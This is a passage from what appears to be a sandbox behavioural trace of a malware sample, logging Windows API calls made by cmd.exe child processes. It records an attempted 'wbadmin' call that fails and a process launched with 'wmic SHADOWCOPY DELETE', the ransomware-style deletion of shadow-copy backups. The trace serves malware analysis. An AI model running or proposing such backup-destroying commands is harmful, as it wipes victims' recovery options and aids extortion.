(_String1="wbadmin", _String2="POPD") returned 7 [0076.932] _wcsicmp (_String1="wbadmin", _String2="ASSOC") returned 22 [0076.932] _wcsicmp (_String1="wbadmin", _String2="FTYPE") returned 17 [0076.932] _wcsicmp (_String1="wbadmin", _String2="BREAK") returned 21 [0076.932] _wcsicmp (_String1="wbadmin", _String2="COLOR") returned 20 [0076.932] _wcsicmp (_String1="wbadmin", _String2="MKLINK") returned 10 [0076.932] _wcsicmp (_String1="wbadmin", _String2="FOR") returned 17 [0076.933] _wcsicmp (_String1="wbadmin", _String2="IF") returned 14 [0076.933] _wcsicmp (_String1="wbadmin", _String2="REM") returned 5 [0076.933] GetProcessHeap () returned 0x4b0000 [0076.933] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x210) returned 0x4c3150 [0076.933] GetProcessHeap () returned 0x4b0000 [0076.933] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x6c) returned 0x4c3368 [0076.933] _wcsnicmp (_String1="wbad", _String2="cmd ", _MaxCount=0x4) returned 20 [0076.933] GetProcessHeap () returned 0x4b0000 [0076.933] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x418) returned 0x4b07f0 [0076.933] SetErrorMode (uMode=0x0) returned 0x0 [0076.933] SetErrorMode (uMode=0x1) returned 0x0 [0076.933] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4b07f8, lpFilePart=0x2eede8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2eede8*="Desktop") returned 0x25 [0076.934] SetErrorMode (uMode=0x0) returned 0x1 [0076.934] GetProcessHeap () returned 0x4b0000 [0076.934] RtlReAllocateHeap (Heap=0x4b0000, Flags=0x0, Ptr=0x4b07f0, Size=0x64) returned 0x4b07f0 [0076.934] GetProcessHeap () returned 0x4b0000 [0076.934] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4b07f0) returned 0x64 [0076.934] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0076.934] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0076.934] GetProcessHeap () returned 0x4b0000 [0076.934] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x120) returned 0x4c33e0 [0076.934] GetProcessHeap () returned 0x4b0000 [0076.934] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0x238) returned 0x4b0860 [0076.941] RtlReAllocateHeap (Heap=0x4b0000, Flags=0x0, Ptr=0x4b0860, Size=0x122) returned 0x4b0860 [0076.941] GetProcessHeap () returned 0x4b0000 [0076.941] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4b0860) returned 0x122 [0076.941] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0076.941] GetProcessHeap () returned 0x4b0000 [0076.941] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x8, Size=0xe0) returned 0x4c3508 [0076.941] RtlReAllocateHeap (Heap=0x4b0000, Flags=0x0, Ptr=0x4c3508, Size=0x76) returned 0x4c3508 [0076.941] GetProcessHeap () returned 0x4b0000 [0076.941] RtlSizeHeap (HeapHandle=0x4b0000, Flags=0x0, MemoryPointer=0x4c3508) returned 0x76 [0076.941] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0076.942] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0076.942] GetLastError () returned 0x2 [0076.942] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0076.942] GetLastError () returned 0x2 [0076.942] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0076.942] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0076.942] GetLastError () returned 0x2 [0076.942] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0076.942] GetLastError () returned 0x2 [0076.942] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0076.943] FindFirstFileExW (in: lpFileName="C:\\Windows\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0076.943] GetLastError () returned 0x2 [0076.943] FindFirstFileExW (in: lpFileName="C:\\Windows\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0076.943] GetLastError () returned 0x2 [0076.943] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0076.943] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0077.121] GetLastError () returned 0x2 [0077.121] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0077.122] GetLastError () returned 0x2 [0077.122] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0077.123] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0077.470] GetLastError () returned 0x2 [0077.470] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x2eeb64, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeb64) returned 0xffffffff [0077.471] GetLastError () returned 0x2 [0077.471] _get_osfhandle (_FileHandle=2) returned 0xb [0077.471] GetFileType (hFile=0xb) returned 0x2 [0077.471] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0077.471] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2eefb8 | out: lpMode=0x2eefb8) returned 1 [0077.471] _get_osfhandle (_FileHandle=2) returned 0xb [0077.471] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x2eefec | out: lpConsoleScreenBufferInfo=0x2eefec) returned 1 [0077.472] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a834640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0077.472] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x4a834640, nSize=0x2000, Arguments=0x2ef02c | out: lpBuffer="'wbadmin' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0077.472] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a834640*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x2ef010, lpReserved=0x0 | out: lpBuffer=0x4a834640*, lpNumberOfCharsWritten=0x2ef010*=0x62) returned 1 [0077.473] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.473] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0077.473] _get_osfhandle (_FileHandle=1) returned 0x7 [0077.473] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0077.473] _get_osfhandle (_FileHandle=0) returned 0x3 [0077.473] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0077.473] SetConsoleInputExeNameW () returned 0x1 [0077.474] GetConsoleOutputCP () returned 0x1b5 [0077.474] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0077.474] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.474] exit (_Code=1) Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x458e6000" os_pid = "0xa4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x5bc" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c wmic SHADOWCOPY DELETE" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 37 os_tid = 0xac8 [0076.740] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x34f9f4 | out: lpSystemTimeAsFileTime=0x34f9f4*(dwLowDateTime=0xf283b280, dwHighDateTime=0x1d61645)) [0076.741] GetCurrentProcessId () returned 0xa4c [0076.741] GetCurrentThreadId () returned 0xac8 [0076.741] GetTickCount () returned 0x11496d4 [0076.741] QueryPerformanceCounter (in: lpPerformanceCount=0x34f9ec | out: lpPerformanceCount=0x34f9ec*=19709534627) returned 1 [0076.742] GetModuleHandleA (lpModuleName=0x0) returned 0x4a800000 [0076.742] __set_app_type (_Type=0x1) [0076.742] __p__fmode () returned 0x770331f4 [0076.742] __p__commode () returned 0x770331fc [0076.743] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8221a6) returned 0x0 [0076.743] __getmainargs (in: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c, _DoWildCard=0, _StartInfo=0x4a824140 | out: _Argc=0x4a824238, _Argv=0x4a824240, _Env=0x4a82423c) returned 0 [0076.743] GetCurrentThreadId () returned 0xac8 [0076.743] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xac8) returned 0x60 [0076.743] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0076.743] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0076.743] SetThreadUILanguage (LangId=0x0) returned 0x409 [0076.744] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0076.744] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x34f984 | out: phkResult=0x34f984*=0x0) returned 0x2 [0076.744] VirtualQuery (in: lpAddress=0x34f9bb, lpBuffer=0x34f954, dwLength=0x1c | out: lpBuffer=0x34f954*(BaseAddress=0x34f000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.744] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x34f954, dwLength=0x1c | out: lpBuffer=0x34f954*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0076.744] VirtualQuery (in: lpAddress=0x251000, lpBuffer=0x34f954, dwLength=0x1c | out: lpBuffer=0x34f954*(BaseAddress=0x251000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0076.744] VirtualQuery (in: lpAddress=0x253000, lpBuffer=0x34f954, dwLength=0x1c | out: lpBuffer=0x34f954*(BaseAddress=0x253000, AllocationBase=0x250000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0076.744] VirtualQuery (in: lpAddress=0x350000, lpBuffer=0x34f954, dwLength=0x1c | out: lpBuffer=0x34f954*(BaseAddress=0x350000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x100000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0076.744] GetConsoleOutputCP () returned 0x1b5 [0076.744] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a824260 | out: lpCPInfo=0x4a824260) returned 1 [0076.745] SetConsoleCtrlHandler (HandlerRoutine=0x4a81e72a, Add=1) returned 1 [0076.745] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.745] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0076.745] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.745] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8241ac | out: lpMode=0x4a8241ac) returned 1 [0076.745] _get_osfhandle (_FileHandle=1) returned 0x7 [0076.745] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0076.746] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.746] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8241b0 | out: lpMode=0x4a8241b0) returned 1 [0076.746] _get_osfhandle (_FileHandle=0) returned 0x3 [0076.746] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0076.746] GetEnvironmentStringsW () returned 0x5e2030* [0076.747] GetProcessHeap () returned 0x5d0000 [0076.747] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xaca) returned 0x5e2b08 [0076.747] FreeEnvironmentStringsW (penv=0x5e2030) returned 1 [0076.747] GetProcessHeap () returned 0x5d0000 [0076.747] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x4) returned 0x5e0c68 [0076.747] GetEnvironmentStringsW () returned 0x5e2030* [0076.747] GetProcessHeap () returned 0x5d0000 [0076.747] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xaca) returned 0x5e35e0 [0076.747] FreeEnvironmentStringsW (penv=0x5e2030) returned 1 [0076.747] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34e8f4 | out: phkResult=0x34e8f4*=0x68) returned 0x0 [0076.747] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x0, lpData=0x34e900*=0x0, lpcbData=0x34e8f8*=0x1000) returned 0x2 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x4, lpData=0x34e900*=0x1, lpcbData=0x34e8f8*=0x4) returned 0x0 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x0, lpData=0x34e900*=0x1, lpcbData=0x34e8f8*=0x1000) returned 0x2 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x4, lpData=0x34e900*=0x0, lpcbData=0x34e8f8*=0x4) returned 0x0 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x4, lpData=0x34e900*=0x40, lpcbData=0x34e8f8*=0x4) returned 0x0 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x4, lpData=0x34e900*=0x40, lpcbData=0x34e8f8*=0x4) returned 0x0 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x0, lpData=0x34e900*=0x40, lpcbData=0x34e8f8*=0x1000) returned 0x2 [0076.748] RegCloseKey (hKey=0x68) returned 0x0 [0076.748] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x34e8f4 | out: phkResult=0x34e8f4*=0x68) returned 0x0 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x0, lpData=0x34e900*=0x40, lpcbData=0x34e8f8*=0x1000) returned 0x2 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x4, lpData=0x34e900*=0x1, lpcbData=0x34e8f8*=0x4) returned 0x0 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x0, lpData=0x34e900*=0x1, lpcbData=0x34e8f8*=0x1000) returned 0x2 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x4, lpData=0x34e900*=0x0, lpcbData=0x34e8f8*=0x4) returned 0x0 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x4, lpData=0x34e900*=0x9, lpcbData=0x34e8f8*=0x4) returned 0x0 [0076.748] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x4, lpData=0x34e900*=0x9, lpcbData=0x34e8f8*=0x4) returned 0x0 [0076.749] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x34e8fc, lpData=0x34e900, lpcbData=0x34e8f8*=0x1000 | out: lpType=0x34e8fc*=0x0, lpData=0x34e900*=0x9, lpcbData=0x34e8f8*=0x1000) returned 0x2 [0076.749] RegCloseKey (hKey=0x68) returned 0x0 [0076.749] time (in: timer=0x0 | out: timer=0x0) returned 0x5e9c43c9 [0076.749] srand (_Seed=0x5e9c43c9) [0076.749] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c wmic SHADOWCOPY DELETE" [0076.749] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c wmic SHADOWCOPY DELETE" [0076.749] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.749] GetProcessHeap () returned 0x5d0000 [0076.749] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x210) returned 0x5e2030 [0076.749] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5e2038, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0076.750] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0076.750] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0076.750] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.750] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0076.750] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0076.750] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0076.750] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0076.750] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0076.750] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0076.750] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0076.750] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0076.750] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0076.750] GetProcessHeap () returned 0x5d0000 [0076.750] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e2b08 | out: hHeap=0x5d0000) returned 1 [0076.750] GetEnvironmentStringsW () returned 0x5e2248* [0076.750] GetProcessHeap () returned 0x5d0000 [0076.750] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xae2) returned 0x5e4ba8 [0076.750] FreeEnvironmentStringsW (penv=0x5e2248) returned 1 [0076.750] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0076.750] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a830640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0076.750] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0076.751] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0076.751] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0076.751] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0076.751] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0076.751] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0076.751] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0076.751] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0076.751] GetProcessHeap () returned 0x5d0000 [0076.751] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x54) returned 0x5e5698 [0076.751] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x34f6c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.751] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x34f6c0, lpFilePart=0x34f6bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x34f6bc*="Desktop") returned 0x25 [0076.751] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.751] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x34f43c | out: lpFindFileData=0x34f43c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5e1eb0 [0076.751] FindClose (in: hFindFile=0x5e1eb0 | out: hFindFile=0x5e1eb0) returned 1 [0076.751] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x34f43c | out: lpFindFileData=0x34f43c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5e1eb0 [0076.752] FindClose (in: hFindFile=0x5e1eb0 | out: hFindFile=0x5e1eb0) returned 1 [0076.752] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0076.752] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x34f43c | out: lpFindFileData=0x34f43c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe392fd80, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0xe392fd80, ftLastWriteTime.dwHighDateTime=0x1d61645, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5e1eb0 [0076.752] FindClose (in: hFindFile=0x5e1eb0 | out: hFindFile=0x5e1eb0) returned 1 [0076.752] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0076.752] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0076.752] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0076.752] GetProcessHeap () returned 0x5d0000 [0076.752] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e4ba8 | out: hHeap=0x5d0000) returned 1 [0076.752] GetEnvironmentStringsW () returned 0x5e40b8* [0076.752] GetProcessHeap () returned 0x5d0000 [0076.752] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0xb36) returned 0x5e5ef8 [0076.753] FreeEnvironmentStringsW (penv=0x5e40b8) returned 1 [0076.753] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a825260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0076.753] GetProcessHeap () returned 0x5d0000 [0076.753] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e5698 | out: hHeap=0x5d0000) returned 1 [0076.753] GetProcessHeap () returned 0x5d0000 [0076.753] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x400e) returned 0x5e6a38 [0076.753] GetProcessHeap () returned 0x5d0000 [0076.753] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x8, Size=0x3a) returned 0x5e1eb0 [0076.753] GetProcessHeap () returned 0x5d0000 [0076.753] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e6a38 | out: hHeap=0x5d0000) returned 1 [0076.753] GetConsoleOutputCP () returned 0x1b5 [0076.754] GetCPInfo (in: 